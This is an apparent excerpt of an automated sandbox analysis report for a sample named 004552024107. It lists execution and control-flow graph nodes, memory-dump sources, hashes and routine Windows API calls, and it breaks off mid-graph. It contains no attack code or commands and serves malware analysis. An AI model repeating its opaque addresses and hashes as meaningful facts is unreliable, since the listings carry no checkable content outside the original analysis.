                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                            • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C

                                            Execution Graph

                                            Execution Coverage:7.6%
                                            Dynamic/Decrypted Code Coverage:97.7%
                                            Signature Coverage:0%
                                            Total number of Nodes:132
                                            Total number of Limit Nodes:12
                                            execution_graph 33272 365e191f 33273 365e18de 33272->33273 33274 365e192e 33272->33274 33277 365e0dac 33273->33277 33276 365e18ed 33276->33276 33279 365e0db7 33277->33279 33278 365e1f44 33280 365e1f9f 33278->33280 33298 373a09e0 33278->33298 33302 373a0724 33278->33302 33279->33278 33279->33280 33286 365e37c8 33279->33286 33290 365e37b8 33279->33290 33294 365e3780 33279->33294 33280->33276 33288 365e37e9 33286->33288 33287 365e380d 33287->33278 33288->33287 33306 365e3978 33288->33306 33292 365e37c1 33290->33292 33291 365e380d 33291->33278 33292->33291 33293 365e3978 FindWindowW 33292->33293 33293->33291 33295 365e3783 33294->33295 33296 365e378b 33295->33296 33297 365e3978 FindWindowW 33295->33297 33296->33278 33297->33296 33300 373a0a45 33298->33300 33299 373a0a92 33299->33280 33300->33299 33301 373a0ea8 WaitMessage 33300->33301 33301->33300 33304 373a0a45 33302->33304 33303 373a0ea8 WaitMessage 33303->33304 33304->33303 33305 373a0a92 33304->33305 33305->33280 33307 365e3985 33306->33307 33308 365e39be 33307->33308 33310 365e1c9c 33307->33310 33308->33287 33311 365e1ca7 33310->33311 33312 365e3a30 33311->33312 33314 365e1cd0 33311->33314 33312->33312 33315 365e1cdb 33314->33315 33318 365e1ce0 33315->33318 33317 365e3a9f 33317->33312 33319 365e1ceb 33318->33319 33324 365e3e9c 33319->33324 33321 365e5128 33321->33317 33322 365e37c8 FindWindowW 33322->33321 33323 365e4f00 33323->33321 33323->33322 33325 365e3ea7 33324->33325 33327 365e6331 33325->33327 33328 365e4cac 33325->33328 33327->33323 33330 365e6490 FindWindowW 33328->33330 33331 365e6515 33330->33331 33331->33327 33332 365e1298 DuplicateHandle 33333 365e132e 33332->33333 33348 ad01c 33349 ad034 33348->33349 33350 ad08e 33349->33350 33355 365e8abc 33349->33355 33365 365ec518 33349->33365 33375 365eb7b8 33349->33375 33379 365eb7c8 33349->33379 33356 365e8ac7 33355->33356 33357 365ec589 33356->33357 33359 365ec579 33356->33359 33360 365ec587 33357->33360 33408 365e8be4 33357->33408 33383 365ecab8 33359->33383 33388 365ecaa8 33359->33388 33393 365ecb60 33359->33393 33402 365ecb84 33359->33402 33368 365ec555 33365->33368 33366 365ec589 33367 365e8be4 CallWindowProcW 33366->33367 33370 365ec587 33366->33370 33367->33370 33368->33366 33369 365ec579 33368->33369 33371 365ecab8 CallWindowProcW 33369->33371 33372 365ecaa8 CallWindowProcW 33369->33372 33373 365ecb84 CallWindowProcW 33369->33373 33374 365ecb60 CallWindowProcW 33369->33374 33371->33370 33372->33370 33373->33370 33374->33370 33376 365eb7ee 33375->33376 33377 365e8abc CallWindowProcW 33376->33377 33378 365eb80f 33377->33378 33378->33350 33380 365eb7ee 33379->33380 33381 365e8abc CallWindowProcW 33380->33381 33382 365eb80f 33381->33382 33382->33350 33385 365ecacc 33383->33385 33384 365ecb58 33384->33360 33387 365ecb60 CallWindowProcW 33385->33387 33412 365ecb70 33385->33412 33387->33384 33389 365ecacc 33388->33389 33391 365ecb70 CallWindowProcW 33389->33391 33392 365ecb60 CallWindowProcW 33389->33392 33390 365ecb58 33390->33360 33391->33390 33392->33390 33394 365ecb6a 33393->33394 33395 365ecb3b 33393->33395 33394->33395 33396 365ecb6e 33394->33396 33400 365ecb70 CallWindowProcW 33395->33400 33401 365ecb60 CallWindowProcW 33395->33401 33397 365ecb81 33396->33397 33399 365edd40 CallWindowProcW 33396->33399 33397->33360 33398 365ecb58 33398->33360 33399->33397 33400->33398 33401->33398 33403 365ecb92 33402->33403 33404 365ecb42 33402->33404 33406 365ecb70 CallWindowProcW 33404->33406 33407 365ecb60 CallWindowProcW 33404->33407 33405 365ecb58 33405->33360 33406->33405 33407->33405 33409 365e8bef 33408->33409 33410 365eddfa CallWindowProcW 33409->33410 33411 365edda9 33409->33411 33410->33411 33411->33360 33413 365ecb81 33412->33413 33415 365edd40 33412->33415 33413->33384 33416 365e8be4 CallWindowProcW 33415->33416 33417 365edd4a 33416->33417 33417->33413 33418 373a0040 33419 373a0348 33418->33419 33420 373a0068 33418->33420 33421 373a0071 33420->33421 33424 373a0370 33420->33424 33425 373a037b 33424->33425 33426 373a0094 33425->33426 33429 373a03b9 33425->33429 33432 373a03c0 OleInitialize 33425->33432 33430 373a03c0 OleInitialize 33429->33430 33431 373a0424 33430->33431 33431->33426 33433 373a0424 33432->33433 33433->33426 33334 365e1050 33335 365e1096 GetCurrentProcess 33334->33335 33337 365e10e8 GetCurrentThread 33335->33337 33338 365e10e1 33335->33338 33339 365e111e 33337->33339 33340 365e1125 GetCurrentProcess 33337->33340 33338->33337 33339->33340 33343 365e115b 33340->33343 33341 365e1183 GetCurrentThreadId 33342 365e11b4 33341->33342 33343->33341 33344 365eb610 33345 365eb678 CreateWindowExW 33344->33345 33347 365eb734 33345->33347

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 623 373765f8-37376619 624 3737661b-3737661e 623->624 625 37376644-37376647 624->625 626 37376620-3737663f 624->626 627 3737664d-3737666c 625->627 628 37376de8-37376dea 625->628 626->625 636 37376685-3737668f 627->636 637 3737666e-37376671 627->637 630 37376df1-37376df4 628->630 631 37376dec 628->631 630->624 633 37376dfa-37376e03 630->633 631->630 640 37376695-373766a4 636->640 637->636 638 37376673-37376683 637->638 638->640 749 373766a6 call 37376e11 640->749 750 373766a6 call 37376e18 640->750 642 373766ab-373766b0 643 373766b2-373766b8 642->643 644 373766bd-3737699a 642->644 643->633 665 373769a0-37376a4f 644->665 666 37376dda-37376de7 644->666 675 37376a51-37376a76 665->675 676 37376a78 665->676 678 37376a81-37376a94 675->678 676->678 680 37376dc1-37376dcd 678->680 681 37376a9a-37376aad 678->681 680->665 682 37376dd3 680->682 683 37376ab7-37376abc 681->683 682->666 683->680 684 37376ac2-37376acc 683->684 684->680 685 37376ad2-37376add 684->685 685->680 686 37376ae3-37376bb9 685->686 698 37376bc7-37376bf7 686->698 699 37376bbb-37376bbd 686->699 703 37376c05-37376c11 698->703 704 37376bf9-37376bfb 698->704 699->698 705 37376c13-37376c17 703->705 706 37376c71-37376c75 703->706 704->703 705->706 707 37376c19-37376c43 705->707 708 37376db2-37376dbb 706->708 709 37376c7b-37376cb7 706->709 716 37376c45-37376c47 707->716 717 37376c51-37376c6e 707->717 708->680 708->686 719 37376cc5-37376cd3 709->719 720 37376cb9-37376cbb 709->720 716->717 717->706 723 37376cd5-37376ce0 719->723 724 37376cea-37376cf5 719->724 720->719 723->724 729 37376ce2 723->729 727 37376cf7-37376cfd 724->727 728 37376d0d-37376d1e 724->728 730 37376d01-37376d03 727->730 731 37376cff 727->731 733 37376d36-37376d42 728->733 734 37376d20-37376d26 728->734 729->724 730->728 731->728 738 37376d44-37376d4a 733->738 739 37376d5a-37376dab 733->739 735 37376d2a-37376d2c 734->735 736 37376d28 734->736 735->733 736->733 740 37376d4e-37376d50 738->740 741 37376d4c 738->741 739->708 740->739 741->739 749->642 750->642
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $=q$$=q$$=q$$=q$$=q$$=q
                                            • API String ID: 0-3036472327
                                            • Opcode ID: 475bf56a35d3c0d0ddca81d0b6f91f37dde788a9bcd2a556289efb8cf99c47ca
                                            • Instruction ID: e294950efe30ae38ed43f860a8a4f8ebe2b8aedcf9276ec4b1960709f196e71f
                                            • Opcode Fuzzy Hash: 475bf56a35d3c0d0ddca81d0b6f91f37dde788a9bcd2a556289efb8cf99c47ca
                                            • Instruction Fuzzy Hash: 5B324D35E1065ACBDB15DF78C89469DF7B2BF89300F50C66AD449AB214EF30A985CB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 797 373a09e0-373a0a43 798 373a0a72-373a0a90 797->798 799 373a0a45-373a0a6f 797->799 804 373a0a99-373a0ad0 798->804 805 373a0a92-373a0a94 798->805 799->798 809 373a0f01 804->809 810 373a0ad6-373a0aea 804->810 806 373a0f52-373a0f67 805->806 813 373a0f06-373a0f1c 809->813 811 373a0b19-373a0b38 810->811 812 373a0aec-373a0b16 810->812 819 373a0b3a-373a0b40 811->819 820 373a0b50-373a0b52 811->820 812->811 813->806 821 373a0b42 819->821 822 373a0b44-373a0b46 819->822 823 373a0b71-373a0b7a 820->823 824 373a0b54-373a0b6c 820->824 821->820 822->820 826 373a0b82-373a0b89 823->826 824->813 827 373a0b8b-373a0b91 826->827 828 373a0b93-373a0b9a 826->828 829 373a0ba7-373a0bbb 827->829 830 373a0b9c-373a0ba2 828->830 831 373a0ba4 828->831 832 373a0bc2-373a0bc4 829->832 830->829 831->829 833 373a0bca-373a0bd1 832->833 834 373a0d19-373a0d1d 832->834 833->809 835 373a0bd7-373a0c14 833->835 836 373a0eec-373a0eff 834->836 837 373a0d23-373a0d27 834->837 845 373a0c1a-373a0c1f 835->845 846 373a0ee2-373a0ee6 835->846 836->813 838 373a0d29-373a0d3c 837->838 839 373a0d41-373a0d4a 837->839 838->813 841 373a0d79-373a0d80 839->841 842 373a0d4c-373a0d76 839->842 843 373a0e1f-373a0e34 841->843 844 373a0d86-373a0d8d 841->844 842->841 843->846 856 373a0e3a-373a0e3c 843->856 848 373a0d8f-373a0db9 844->848 849 373a0dbc-373a0dde 844->849 850 373a0c51-373a0c64 845->850 851 373a0c21-373a0c2f 845->851 846->826 846->836 848->849 849->843 881 373a0de0-373a0dea 849->881 854 373a0c6b-373a0c6f 850->854 851->850 863 373a0c31-373a0c4f 851->863 859 373a0ce0-373a0ced 854->859 860 373a0c71-373a0c83 call 373a05cc 854->860 861 373a0e89-373a0ea6 856->861 862 373a0e3e-373a0e77 856->862 859->846 872 373a0cf3-373a0cfd 859->872 884 373a0cc3-373a0cdb 860->884 885 373a0c85-373a0cb5 860->885 861->846 878 373a0ea8-373a0ed4 WaitMessage 861->878 875 373a0e79-373a0e7f 862->875 876 373a0e80-373a0e87 862->876 863->854 887 373a0cff-373a0d07 call 373a05dc 872->887 888 373a0d0c-373a0d14 call 373a05e8 872->888 875->876 876->846 879 373a0edb 878->879 880 373a0ed6 878->880 879->846 880->879 892 373a0dec-373a0df2 881->892 893 373a0e02-373a0e1d 881->893 884->813 899 373a0cbc 885->899 900 373a0cb7 885->900 887->846 888->846 897 373a0df6-373a0df8 892->897 898 373a0df4 892->898 893->843 893->881 897->893 898->893 899->884 900->899
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170780124.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_373a0000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: n.57
                                            • API String ID: 0-3538047871
                                            • Opcode ID: cd5b4a3a322efd311d4e865d7a462a0b3b3b773d60194fed33d1b14bd9a500a4
                                            • Instruction ID: d38d3801e56ff98a2c0817c4a06f67669b83775b06a15ebd6e48933fb2ad743d
                                            • Opcode Fuzzy Hash: cd5b4a3a322efd311d4e865d7a462a0b3b3b773d60194fed33d1b14bd9a500a4
                                            • Instruction Fuzzy Hash: C4F14A75A00309CFEB44CFA9C985B9DBBF1FF88314F158569D409AB261EB71E945CB80
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 142d35b6ea37ea41e2088499bf84bc621ad44c28c8be4fe8216d66c5ae88030b
                                            • Instruction ID: b167997183a0ebf0f8c2a8a8964f51a5c67c91536d4988f6a9769f6c86df2ff2
                                            • Opcode Fuzzy Hash: 142d35b6ea37ea41e2088499bf84bc621ad44c28c8be4fe8216d66c5ae88030b
                                            • Instruction Fuzzy Hash: 6B53F431C10B5ACADB51EF68C880599F7B1FF99310F15C79AE4587B221EB70AAD4CB81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3eed18a4c1ddf3afe3803c3463001112a343fce0a82dd444e03e99b0facfe179
                                            • Instruction ID: a04f7727db7b003e6f5dec07b31b8738732c0b9266ff7922937c983e1d486b76
                                            • Opcode Fuzzy Hash: 3eed18a4c1ddf3afe3803c3463001112a343fce0a82dd444e03e99b0facfe179
                                            • Instruction Fuzzy Hash: E0333C31D10B5A8EDB11EF68C88469DF7B1FF89310F51C79AE449A7211EB70AAC5CB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2342 373787e2-373787e3 2343 373787e6-373787e9 2342->2343 2344 373787eb-373787f9 2343->2344 2345 37378808-3737880b 2343->2345 2348 37378800-37378803 2344->2348 2346 3737880d-37378813 2345->2346 2347 3737881a-3737881d 2345->2347 2349 37378815 2346->2349 2350 373787a0-373787a6 2346->2350 2351 37378825-37378828 2347->2351 2352 3737881f-37378820 2347->2352 2348->2345 2349->2347 2353 3737890f-3737893b 2350->2353 2354 373787ac-373787b7 2350->2354 2355 37378830-37378833 2351->2355 2356 3737882a-3737882b 2351->2356 2352->2351 2368 37378945-37378948 2353->2368 2354->2353 2357 373787bd-373787ca 2354->2357 2358 37378835-3737883b 2355->2358 2359 37378842-37378845 2355->2359 2356->2355 2357->2353 2363 373787d0-373787d4 2357->2363 2358->2356 2364 3737883d 2358->2364 2360 37378847-37378850 2359->2360 2361 37378851-37378854 2359->2361 2365 37378856-3737886c 2361->2365 2366 37378871-37378874 2361->2366 2367 373787d9-373787dc 2363->2367 2364->2359 2365->2366 2370 37378876-3737887a 2366->2370 2371 37378885-37378888 2366->2371 2367->2343 2369 373787de 2367->2369 2372 3737896a-3737896d 2368->2372 2373 3737894a-3737894e 2368->2373 2369->2342 2375 37378901-3737890e 2370->2375 2376 37378880 2370->2376 2377 3737888a-3737888d 2371->2377 2378 37378898-3737889b 2371->2378 2381 37378981-37378984 2372->2381 2382 3737896f-37378976 2372->2382 2379 37378a36-37378a74 2373->2379 2380 37378954-3737895c 2373->2380 2376->2371 2377->2344 2383 37378893 2377->2383 2384 373788b2-373788b5 2378->2384 2385 3737889d-373788ad 2378->2385 2413 37378a76-37378a79 2379->2413 2380->2379 2387 37378962-37378965 2380->2387 2390 373789a6-373789a9 2381->2390 2391 37378986-3737898a 2381->2391 2388 37378a2e-37378a35 2382->2388 2389 3737897c 2382->2389 2383->2378 2384->2346 2386 373788bb-373788be 2384->2386 2385->2384 2392 373788c0-373788d5 2386->2392 2393 373788da-373788dd 2386->2393 2387->2372 2389->2381 2396 373789b3-373789b6 2390->2396 2397 373789ab-373789b2 2390->2397 2391->2379 2395 37378990-37378998 2391->2395 2392->2393 2399 373788df-373788e5 2393->2399 2400 373788ea-373788ed 2393->2400 2395->2379 2401 3737899e-373789a1 2395->2401 2402 373789c7-373789ca 2396->2402 2403 373789b8-373789c2 2396->2403 2399->2400 2400->2377 2408 373788ef-373788f1 2400->2408 2401->2390 2404 373789e4-373789e7 2402->2404 2405 373789cc-373789d0 2402->2405 2403->2402 2411 37378a01-37378a04 2404->2411 2412 373789e9-373789ed 2404->2412 2405->2379 2410 373789d2-373789da 2405->2410 2414 373788f3 2408->2414 2415 373788f8-373788fb 2408->2415 2410->2379 2416 373789dc-373789df 2410->2416 2420 37378a06-37378a17 2411->2420 2421 37378a1c-37378a1e 2411->2421 2412->2379 2417 373789ef-373789f7 2412->2417 2418 37378a93-37378a96 2413->2418 2419 37378a7b-37378a8c 2413->2419 2414->2415 2415->2375 2422 3737874f-37378752 2415->2422 2416->2404 2417->2379 2423 373789f9-373789fc 2417->2423 2424 37378aa0-37378aa3 2418->2424 2425 37378a98-37378a9d 2418->2425 2434 37378aa5-37378ab8 2419->2434 2441 37378a8e 2419->2441 2420->2421 2426 37378a25-37378a28 2421->2426 2427 37378a20 2421->2427 2428 37378776-37378779 2422->2428 2429 37378754-37378771 2422->2429 2423->2411 2424->2434 2435 37378abb-37378abe 2424->2435 2425->2424 2426->2368 2426->2388 2427->2426 2430 37378791-37378794 2428->2430 2431 3737877b-3737878c 2428->2431 2429->2428 2439 37378796-37378798 2430->2439 2440 3737879b-3737879e 2430->2440 2431->2430 2437 37378ac0-37378ad1 2435->2437 2438 37378adc-37378adf 2435->2438 2450 37378ad7 2437->2450 2451 37378e14-37378e1b 2437->2451 2443 37378ae5-37378c79 2438->2443 2444 37378dc8-37378dcb 2438->2444 2439->2440 2440->2350 2440->2367 2441->2418 2492 37378db2-37378dc5 2443->2492 2493 37378c7f-37378c86 2443->2493 2448 37378dcd-37378dde 2444->2448 2449 37378de9-37378dec 2444->2449 2448->2437 2459 37378de4 2448->2459 2449->2443 2452 37378df2-37378df5 2449->2452 2450->2438 2454 37378e20-37378e23 2451->2454 2456 37378df7-37378e08 2452->2456 2457 37378e0f-37378e12 2452->2457 2454->2443 2458 37378e29-37378e2c 2454->2458 2456->2451 2466 37378e0a 2456->2466 2457->2451 2457->2454 2461 37378e46-37378e49 2458->2461 2462 37378e2e-37378e3f 2458->2462 2459->2449 2464 37378e57-37378e59 2461->2464 2465 37378e4b-37378e52 2461->2465 2462->2451 2471 37378e41 2462->2471 2469 37378e60-37378e63 2464->2469 2470 37378e5b 2464->2470 2465->2464 2466->2457 2469->2413 2472 37378e69-37378e72 2469->2472 2470->2469 2471->2461 2494 37378c8c-37378cbf 2493->2494 2495 37378d3a-37378d41 2493->2495 2506 37378cc4-37378d05 2494->2506 2507 37378cc1 2494->2507 2495->2492 2497 37378d43-37378d76 2495->2497 2508 37378d7b-37378da8 2497->2508 2509 37378d78 2497->2509 2517 37378d07-37378d18 2506->2517 2518 37378d1d-37378d2e 2506->2518 2507->2506 2508->2472 2509->2508 2517->2472 2518->2472
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $
                                            • API String ID: 0-3993045852
                                            • Opcode ID: 601ec8223de6eb58801efffa814f2b96c13419add2f9afe743421edc77cfcc43
                                            • Instruction ID: ecc3b96acf211742b05c5ea222035cc9fbae728b0e0184d0c680d975ce580834
                                            • Opcode Fuzzy Hash: 601ec8223de6eb58801efffa814f2b96c13419add2f9afe743421edc77cfcc43
                                            • Instruction Fuzzy Hash: 8222C339E002499FEB14CF64C5846DEBBB2EF85364F208469D409AB385DB39EC46DB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V_k
                                            • API String ID: 0-804111439
                                            • Opcode ID: c3b69b199dad89591c9ac097933bbd9ab76f737649c55bb25073913fefbb785d
                                            • Instruction ID: 1f2e705c86c2c7aa9119771a7bdedbf73729554e7d5e913a91814638a71b3c86
                                            • Opcode Fuzzy Hash: c3b69b199dad89591c9ac097933bbd9ab76f737649c55bb25073913fefbb785d
                                            • Instruction Fuzzy Hash: 89918270E00209CFDF14CFA8D9857DDBBF2BF48355F248129E825AB294DB749989CB91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 295ee97edb7046de31e3f32af9c67b49e100d5f460639145c99f8364e30e568d
                                            • Instruction ID: 103dbabdce584154f363f3912271b867d28828e898c56e180b21451df82f3732
                                            • Opcode Fuzzy Hash: 295ee97edb7046de31e3f32af9c67b49e100d5f460639145c99f8364e30e568d
                                            • Instruction Fuzzy Hash: 0D628F34B002489FDB09DF68D594A9DB7F2EF88364F508569E409EB395DB39ED42CB80
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a58ea9b5a79733405ebb03f60b9dc3eea338358693e96e816aaf9b685c1e92
                                            • Instruction ID: b6dfc25ea1371eed6cc037ce1643e2070c66d53c2489997806c53a78a1999129
                                            • Opcode Fuzzy Hash: e8a58ea9b5a79733405ebb03f60b9dc3eea338358693e96e816aaf9b685c1e92
                                            • Instruction Fuzzy Hash: 7DB15370E00209CFDF14CFA9D99579DBBF2BF88319F148529D825AB254EB749889CB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 526 3737de0e-3737de12 527 3737de13 526->527 528 3737de89-3737deb3 526->528 529 3737de17-3737de19 527->529 530 3737de14-3737de15 527->530 531 3737deb5-3737debb 528->531 532 3737dec0-3737dec3 528->532 533 3737de23 529->533 530->533 531->532 535 3737dec5 532->535 536 3737ded2-3737dee1 532->536 537 3737de25-3737de54 533->537 539 3737decb-3737decd 535->539 545 3737de5b 537->545 539->536 546 3737de5e-3737de67 545->546 547 3737de6d-3737de77 546->547 548 3737dc89-3737dc92 546->548 549 3737de78-3737de80 548->549 550 3737dc98-3737dc9c 548->550 549->537 557 3737de82-3737de85 549->557 551 3737dca1-3737dca4 550->551 552 3737dca6-3737dcaf 551->552 553 3737dcb4-3737dcb7 551->553 552->553 555 3737dcda-3737dcdd 553->555 556 3737dcb9-3737dcd5 553->556 558 3737dcf7-3737dcfa 555->558 559 3737dcdf-3737dcf2 555->559 556->555 557->528 558->546 560 3737dd00-3737dd03 558->560 559->558 562 3737dd05-3737dd09 560->562 563 3737dd14-3737dd16 560->563 562->547 565 3737dd0f 562->565 566 3737dd1d-3737dd20 563->566 567 3737dd18 563->567 565->563 569 3737dd26-3737dd4a 566->569 570 3737dc60-3737dc63 566->570 567->566 569->545 578 3737dd50-3737dd5f 569->578 571 3737dc65-3737dc6a 570->571 572 3737dc6d-3737dc70 570->572 571->572 574 3737dc84-3737dc87 572->574 575 3737dc72-3737dc7f 572->575 574->548 574->551 575->574 580 3737dd77-3737ddb3 578->580 581 3737dd61-3737dd67 578->581 589 3737ddb5-3737ddbb 580->589 590 3737ddcb-3737dde2 580->590 582 3737dd6b-3737dd6d 581->582 583 3737dd69 581->583 582->580 583->580 591 3737ddbf-3737ddc1 589->591 592 3737ddbd 589->592 595 3737dde4-3737ddea 590->595 596 3737ddfa-3737de0b 590->596 591->590 592->590 597 3737ddee-3737ddf0 595->597 598 3737ddec 595->598 596->533 600 3737de0d 596->600 597->596 598->596 600->526
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $=q$$=q$$=q$$=q$$=q$$=q$$=q$$=q
                                            • API String ID: 0-2436140977
                                            • Opcode ID: 0a7d5784c6c0504bda5c78645c745068f2c26607f9a1341af26cee6aa2719219
                                            • Instruction ID: d829be03dfab17381fb7421ccfff0990b6ac519719862f44504b4f863afcf1e2
                                            • Opcode Fuzzy Hash: 0a7d5784c6c0504bda5c78645c745068f2c26607f9a1341af26cee6aa2719219
                                            • Instruction Fuzzy Hash: 3D71D335B20284CFDB1ADF68D58066D77B2EF99364F20442AD859FB245DB39EC42CB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 601 365e1050-365e10df GetCurrentProcess 605 365e10e8-365e111c GetCurrentThread 601->605 606 365e10e1-365e10e7 601->606 607 365e111e-365e1124 605->607 608 365e1125-365e1159 GetCurrentProcess 605->608 606->605 607->608 610 365e115b-365e1161 608->610 611 365e1162-365e117d call 365e121f 608->611 610->611 614 365e1183-365e11b2 GetCurrentThreadId 611->614 615 365e11bb-365e121d 614->615 616 365e11b4-365e11ba 614->616 616->615
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 365E10CE
                                            • GetCurrentThread.KERNEL32 ref: 365E110B
                                            • GetCurrentProcess.KERNEL32 ref: 365E1148
                                            • GetCurrentThreadId.KERNEL32 ref: 365E11A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: (hM6
                                            • API String ID: 2063062207-2288739972
                                            • Opcode ID: e18e4645f8ae2d2e430e03e19c046c057ae5ad48a8ba15cf73a4831efe023a37
                                            • Instruction ID: 1581f649898b27a805a168188d0d8c0312670e89ba3071a6684718b09462687e
                                            • Opcode Fuzzy Hash: e18e4645f8ae2d2e430e03e19c046c057ae5ad48a8ba15cf73a4831efe023a37
                                            • Instruction Fuzzy Hash: 145133B4D002498FDB14DFAAD948BDEFFF1AF89310F208469E509A7291DB359940CB65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 751 37377d00-37377d24 752 37377d26-37377d29 751->752 753 37377d2b-37377d45 752->753 754 37377d4a-37377d4d 752->754 753->754 755 37377d53-37377e4b 754->755 756 3737842c-3737842e 754->756 774 37377e51-37377e9e call 373785d6 755->774 775 37377ece-37377ed5 755->775 757 37378435-37378438 756->757 758 37378430 756->758 757->752 760 3737843e-3737844b 757->760 758->757 788 37377ea4-37377ec0 774->788 776 37377edb-37377f4b 775->776 777 37377f59-37377f62 775->777 794 37377f56 776->794 795 37377f4d 776->795 777->760 791 37377ec2 788->791 792 37377ecb 788->792 791->792 792->775 794->777 795->794
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fBq$XPBq$\OBq
                                            • API String ID: 0-3017553656
                                            • Opcode ID: 1a92bb26898b74eb141638c0a6a14ac1ca9ed137d2fd067e3df961566bc68b02
                                            • Instruction ID: 332c30f738c7db5950fdaee0ff13a2a3f3f8e77a2006d73d072747dfb76c4540
                                            • Opcode Fuzzy Hash: 1a92bb26898b74eb141638c0a6a14ac1ca9ed137d2fd067e3df961566bc68b02
                                            • Instruction Fuzzy Hash: 48617D74B002099FEB149FA4C9547AEBBF6EF88310F20812AE109EB395DF758C459B91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1499 1547f4-15488c 1503 1548d6-1548d8 1499->1503 1504 15488e-154899 1499->1504 1506 1548da-1548f2 1503->1506 1504->1503 1505 15489b-1548a7 1504->1505 1507 1548a9-1548b3 1505->1507 1508 1548ca-1548d4 1505->1508 1513 1548f4-1548ff 1506->1513 1514 15493c-15493e 1506->1514 1509 1548b5 1507->1509 1510 1548b7-1548c6 1507->1510 1508->1506 1509->1510 1510->1510 1512 1548c8 1510->1512 1512->1508 1513->1514 1515 154901-15490d 1513->1515 1516 154940-154952 1514->1516 1517 154930-15493a 1515->1517 1518 15490f-154919 1515->1518 1523 154959-154985 1516->1523 1517->1516 1520 15491d-15492c 1518->1520 1521 15491b 1518->1521 1520->1520 1522 15492e 1520->1522 1521->1520 1522->1517 1524 15498b-154999 1523->1524 1525 1549a2-1549ff 1524->1525 1526 15499b-1549a1 1524->1526 1533 154a01-154a05 1525->1533 1534 154a0f-154a13 1525->1534 1526->1525 1533->1534 1535 154a07-154a0a call 150ab8 1533->1535 1536 154a15-154a19 1534->1536 1537 154a23-154a27 1534->1537 1535->1534 1536->1537 1539 154a1b-154a1e call 150ab8 1536->1539 1540 154a37-154a3b 1537->1540 1541 154a29-154a2d 1537->1541 1539->1537 1542 154a3d-154a41 1540->1542 1543 